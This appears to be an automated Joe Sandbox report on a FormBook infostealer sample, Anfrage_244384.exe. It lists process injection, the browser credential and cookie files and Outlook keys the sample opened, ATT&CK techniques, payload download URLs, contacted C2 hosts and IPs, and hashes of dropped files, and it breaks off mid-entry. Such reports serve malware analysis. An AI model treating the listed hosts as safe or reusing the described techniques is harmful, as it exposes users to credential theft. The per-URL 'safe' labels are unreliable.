Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: NULL target: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\verclsid.exe

Thread register set: target process: 1832

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\verclsid.exe

Thread APC queued: target process: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Process created: C:\Users\user\Desktop\Anfrage_244384.exe "C:\Users\user\Desktop\Anfrage_244384.exe"
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"
Source: C:\Windows\SysWOW64\verclsid.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: dptLotHBnXg.exe, 00000006.00000002.3361913033.00000000019D0000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000000.3013842341.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174579034.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: dptLotHBnXg.exe, 00000006.00000002.3361913033.00000000019D0000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000000.3013842341.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174579034.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: dptLotHBnXg.exe, 00000006.00000002.3361913033.00000000019D0000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000000.3013842341.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174579034.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: dptLotHBnXg.exe, 00000006.00000002.3361913033.00000000019D0000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000000.3013842341.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174579034.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_00405DE5 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000007.00000002.3362363415.0000000000960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3362535904.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3361838593.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3122242151.0000000034330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3123079037.0000000035D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3362392086.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\verclsid.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000007.00000002.3362363415.0000000000960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3362535904.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3361838593.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3122242151.0000000034330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3123079037.0000000035D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3362392086.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Masquerading	1 OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	312 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	1 Access Token Manipulation	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	312 Process Injection	NTDS	2 File and Directory Discovery	Distributed Component Object Model	1 Clipboard Data	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	24 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Anfrage_244384.exe	11%	ReversingLabs	Win32.Trojan.InjectorX
Anfrage_244384.exe	100%	Avira	HEUR/AGEN.1361137

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://familytherapycenter.rs/	0%	Avira URL Cloud	safe
https://familytherapycenter.rs/LxuQG254.bins	0%	Avira URL Cloud	safe
https://familytherapycenter.rs/LxuQG254.bin2	0%	Avira URL Cloud	safe
https://familytherapycenter.rs/LxuQG254.bink	0%	Avira URL Cloud	safe
https://familytherapycenter.rs/LxuQG254.bin	0%	Avira URL Cloud	safe
https://familytherapycenter.rs/LxuQG254.binl	0%	Avira URL Cloud	safe
https://familytherapycenter.rs/LxuQG254.binA	0%	Avira URL Cloud	safe
https://parking.reg.ru/script/get_domain_data?domain_name=www.svarus.online&rand=	0%	Avira URL Cloud	safe
http://www.svarus.online/sa87/?LJ=0zbXYrx&6X64=UqcT3NX6Xc6Oa5c5HtJN6Sm3jRGrdUDSppl2CYCGZerglEzU6CQj7u00+cYUshbCTVWQ/5Gc6Lshk9bP6yg8AmPqwLiPHc0f1bybms24K+7m7zNAaNQIZa1j2XstdwJ+GTV4HpA=	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
familytherapycenter.rs	188.40.95.144	true	false		high
www.svarus.online	194.58.112.174	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://familytherapycenter.rs/LxuQG254.bin	false	Avira URL Cloud: safe	unknown
http://www.svarus.online/sa87/?LJ=0zbXYrx&6X64=UqcT3NX6Xc6Oa5c5HtJN6Sm3jRGrdUDSppl2CYCGZerglEzU6CQj7u00+cYUshbCTVWQ/5Gc6Lshk9bP6yg8AmPqwLiPHc0f1bybms24K+7m7zNAaNQIZa1j2XstdwJ+GTV4HpA=	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://reg.ru	verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	false		high
https://familytherapycenter.rs/	Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/dedicated/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_se	verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.reg.ru/domain/new/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_n	verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.ftp.ftp://ftp.gopher.	Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://familytherapycenter.rs/LxuQG254.bin2	Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://familytherapycenter.rs/LxuQG254.bins	Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	Anfrage_244384.exe	false		high
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-	verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.reg.ru/whois/?check=&dname=www.svarus.online&reg_source=parking_auto	verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	false		high
https://familytherapycenter.rs/LxuQG254.bink	Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://familytherapycenter.rs/LxuQG254.binl	Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://familytherapycenter.rs/LxuQG254.binA	Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	Anfrage_244384.exe, 00000004.00000001.2596303421.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	false		high
http://nsis.sf.net/NSIS_Error	Anfrage_244384.exe	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://parking.reg.ru/script/get_domain_data?domain_name=www.svarus.online&rand=	verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false		high
https://www.reg.ru/sozdanie-saita/	verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	Anfrage_244384.exe, 00000004.00000001.2596303421.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	false		high
https://www.reg.ru/hosting/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_host	verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.40.95.144	familytherapycenter.rs	Germany		24940	HETZNER-ASDE	false
194.58.112.174	www.svarus.online	Russian Federation		197695	AS-REGRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1550253
Start date and time:	2024-11-06 16:09:43 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 25s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Anfrage_244384.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/11@2/2
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 85% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
TCP Packets have been reduced to 100
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Anfrage_244384.exe

Process:	C:\Windows\SysWOW64\verclsid.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	5.7711167426271945
Encrypted:	false
SSDEEP:	192:OPtkumJX7zB22kGwfy0mtVgkCPOsX1un:/702k5qpdsXQn
MD5:	3F176D1EE13B0D7D6BD92E1C7A0B9BAE
SHA1:	FE582246792774C2C9DD15639FFA0ACA90D6FD0B
SHA-256:	FA4AB1D6F79FD677433A31ADA7806373A789D34328DA46CCB0449BBF347BD73E
SHA-512:	0A69124819B7568D0DEA4E9E85CE8FE61C7BA697C934E3A95E2DCFB9F252B1D9DA7FAF8774B6E8EFD614885507ACC94987733EBA09A2F5E7098B774DFC8524B6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L.....MX...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes\nilgedde.mes

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	Matlab v4 mat-file (little endian) Y, numeric, rows 0, columns 0
Category:	dropped
Size (bytes):	354845
Entropy (8bit):	1.2446363869824946
Encrypted:	false
SSDEEP:	768:E2oz5FNvncy2DZRau7W0sxOvPfSfpg5rWuWAAUIdde/FwPPMk/FOuyQv9biuPia6:opho02mYrKiKLFyJ1AIu2
MD5:	DF7A44909B03AB5BC45910B405D9977A
SHA1:	3D0583A7DFB39E559827189E02123F2C983A21D5
SHA-256:	5A3B61A0BC8E81E756374D2A9FF5087FA4496543A635738ACA8911E95D6340D9
SHA-512:	C2B4E951A185FC3FB75109B5CAA554431C1517588D04B8F2BA865F75BE448A0448364BCB84253C9B44579078787DDA616F33666C0C1BF902EC644EBC9A6FE621
Malicious:	false
Reputation:	low
Preview:	..................%.Y.............................[......................z...........................................8.................{................b.......W..........................................#.........................................%....z..................7......................................x.i...+............................................................................8......................................................................................................................-..3..................................................................................\|............T...........................#...........\.....A.............................................7..........'.................... ...................].................J.J..........s................................g..............W........................................................................................................$...g..........................................................

C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes\selefant.kri

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	data
Category:	dropped
Size (bytes):	298017
Entropy (8bit):	1.245520550165085
Encrypted:	false
SSDEEP:	768:nLoDoRi0SWvTrmnVqvh6dzfCaci65UhXqjMctTGA3QBgdRWqrw3q3LFPRvx7H155:DStBsLk6gsifeQIGA0iYRwvy8n
MD5:	B4C9FC75BAB8C9F006A7D9DDBC249F79
SHA1:	70D4047E7E3BB10CF237B82775C89A1D92700162
SHA-256:	1D84F9462C244A4500C213DF8DD79971B286392CA02BC536F5F6C3EEBC94E7E3
SHA-512:	2E2279CB3755AC5708ABB30E8342235B7F0A24223E3D6F4B2B21B62E59012A5126ADC1BD73D7B64E72634728DECCE7A049D3E6F5055F8D74E959BEE54EDBEA4C
Malicious:	false
Preview:	............................_..,...........................................................;...........................................................7...O..................'.........................................P.........L................@....................8....................v..................G.....h.............................................m..+b.....................................................m.......C.....................................i..........................................................................................,................................C..........a...........Y......,...........q....................................................................................................................................................................................................................p................S................L..........)..............................................kF........^........E.................................................

C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes\speil.int

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	data
Category:	dropped
Size (bytes):	497497
Entropy (8bit):	1.2525295412969446
Encrypted:	false
SSDEEP:	1536:rbNZ/Rg8JCCgxT2eIgde/lBWTTBwGceukAdTYz91n6n:9NRg836IVLWHeGxKYQ
MD5:	F3F6C6E37EAB51D3B9B9C059C1EB874C
SHA1:	401E5740CCFBC1DA83BD9B426C11020C812986F2
SHA-256:	B5A607F50C65E41B2BFF7F852F27373177D326D9DFA1040E1C2B3AF62F757BAB
SHA-512:	060B328595ADAF9E85B390AA2AACEEFE4C6197294B7C45594798755C5E04BE1E2110F617B51E38D7DF423CD807FA81B30702CE2548563980B9CA195ECF2C11A7
Malicious:	false
Preview:	.........................................o................j........................................c..6......................................../....................................................m...............................r.D................................T.........................................................8....................x...................................................................!.....O....\................G.........................................G........n....."................:.........................................................................................................@.......<..................................................i.......k..............................................................................................................................=.........g.........................k.............A.......[........................)...........e................................b.............................................6.............

C:\Users\user\AppData\Roaming\secretaryships\Hemmeligt70.Bly

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	data
Category:	dropped
Size (bytes):	58676
Entropy (8bit):	4.585503260397429
Encrypted:	false
SSDEEP:	768:hUm9EMv+RHOORqqYH3VEwnRnXNcmhdmPJPU9FLd86+qWhTeFVk6t6MmaEEXrDH9S:Om9chszXJlVdmPJuTWcJ6+3O9Rh
MD5:	CED0BE5E2D0028EFD3F1249AC1126BA3
SHA1:	3902CD952EA81D8A7D9E0FC1F17972967DDD917D
SHA-256:	4B029ECD2CE2EB26D9686573D7D891E689A717672BB8F76903BC44EC43DA2955
SHA-512:	7F14E8FD856D1D1E2FD89C692685EB70C462BC1C202C4946CC1B0D27E59264278264C3C7EA72E63F9B9BA35C434FAAB305724827A4C8D63ADBE78D8C4E4759FD
Malicious:	false
Preview:	..ll..__.....\|.....VVVVVV.........b...........YY...33333333333.A.KK.---........].{{{{...KK.....T.....................rr...................333.............Q..5....................11.............'........................7...\|\|\|\|\|\|\|..............V.........j.E.......................}....///................''''.......y....>............YYYY...ff.<.....WWWW............................................................................H.....................qq..'''.~..Y.....................@.....mmm.....;..kkkk.......RRRRR...........zz.............UU.....7777...........jj....n...............9.p....,...........Z....s.;..............BBBBBBBB..>.Q.......W........CCCC.xxxx.....FFFF........)......,,.............:::..[[[........TTT.[........PPPP.........S............////.......................^............!..JJ.,.\\\.........ff.........._........ ......hh.................``......................kkkkkk..................................f.Z.........DDDD...z..................R.].;.......R...OO............

C:\Users\user\AppData\Roaming\secretaryships\Tingid.pig

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	data
Category:	dropped
Size (bytes):	476422
Entropy (8bit):	1.2552031449987011
Encrypted:	false
SSDEEP:	1536:zGmPxn4XjZOVebnJjvYbTUBhGKcjnO/EeMHPm:Sm6zYVb849nH6
MD5:	F236A74F28F6F32F81F1347D9F129268
SHA1:	D5BE521661EE4BF3C186C3EAA0411DD5DF6F3EBA
SHA-256:	BEED12F00B12156FF9FA63595DE11A5C01493CF5F85488CB2E159CF1A8236778
SHA-512:	D6AD37DDF7B6B38B90F09186AC81C6A76F16F9A4613D6113F10D7B2A4F68129E570EFFC77A19B04F276277B7A569EBD5FD4A48D2E2E72CEA8CEE5A8F67CC5EF4
Malicious:	false
Preview:	.................................................................7...........................).....$....%..........................#.....M.....................................6.........N.........).......................................................................................a..............t..................................................T.........................................@...........................+..U...................A'..............L..................................................../.............2..............k.........................................................................................................&.............................................>...........................................................\|..........................?...............................&...................................n.q......}....................................E......................................................p........................................6..........

C:\Users\user\AppData\Roaming\secretaryships\anya.por

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	data
Category:	dropped
Size (bytes):	448073
Entropy (8bit):	1.2554221597008608
Encrypted:	false
SSDEEP:	1536:i9EUBeeNEu//hQg77ea6OP/B1p7to4APRUYZAkxe:qFZO5u/B1pBo510
MD5:	3AD8D5763CA124C7392D1F4F53D24F0E
SHA1:	17D48EF1AB8D52A31821A069C225D45201535899
SHA-256:	3965D74DBD296AA8E7524C773FE81FE63A78355145502153CB577E9CB136DDA0
SHA-512:	EE8BDE196A33297BFD4E51ED01E7D0178CF457497E822771D2BE3C58A97681AC52CD19A2BBBB71220F06F6D936A6AA67966295DF3C676104B9643F07CBE37EC8
Malicious:	false
Preview:	............y...k......... ....L..............................................................c....................d...........................p..............R.................................................5...............f.......{......................................................................................J...........@.................E....h...............0................M.................'..............................................-...............Z.........................{...............T............c.W..............n....................H...........................................\|...................................^...........w.................c...............................).....................................y.....<.......................................T........................................................3.....S..<.......?........................................1!......^.............................t................................................G........

C:\Users\user\AppData\Roaming\secretaryships\besiddertrang.gra

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	data
Category:	dropped
Size (bytes):	362911
Entropy (8bit):	1.2562704713226092
Encrypted:	false
SSDEEP:	768:uFKWW9YiDlIMhmjVacve6tEvHBLNB3tQsrTpPH8mZLAUFwsahGF48hDpWRcKthwz:u5W9yMJLNbJ1CbFV3Gd6Ie48dPs
MD5:	8AB9852274FA64E09B5711A2E7D94AAB
SHA1:	2C39272B969040B4C185EE4A69A5F04FD1F7C0DB
SHA-256:	FCD149788A3530E5E2CF5E17A09B1DE51EB67B51F3E8941E7091F88B610373F1
SHA-512:	6761208A22E8D93D70465E6DD9CF1B53826AA6BF0418DCCB0A6E5816A183790A61AD67EDCF52D21366975014701107563CE47A0465CEE801300493AEB566CC69
Malicious:	false
Preview:	....-......................................................................?d..........\.a.....................................8...............x...........e...................................)...............+..............................................i...................................................................................................................4......j................................................................................"......................................Z.....%...................................................................................................F............................................................................g...............................E./.....................................................................................Y........#.......F.......n.M.........................................................................................................................W..................................................

C:\Users\user\AppData\Roaming\secretaryships\darbyite.txt

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	497
Entropy (8bit):	4.296439217688297
Encrypted:	false
SSDEEP:	12:kdESMQrs7ZnIyxrqlLIRF0+UAkN0lCGsMqejQlJ8:QjMfpIuqPAEsOi
MD5:	1560371431CEB91914AF5B9D0D307EE1
SHA1:	182B8979D4D0F9F26366653638A9C92FDAFF0D56
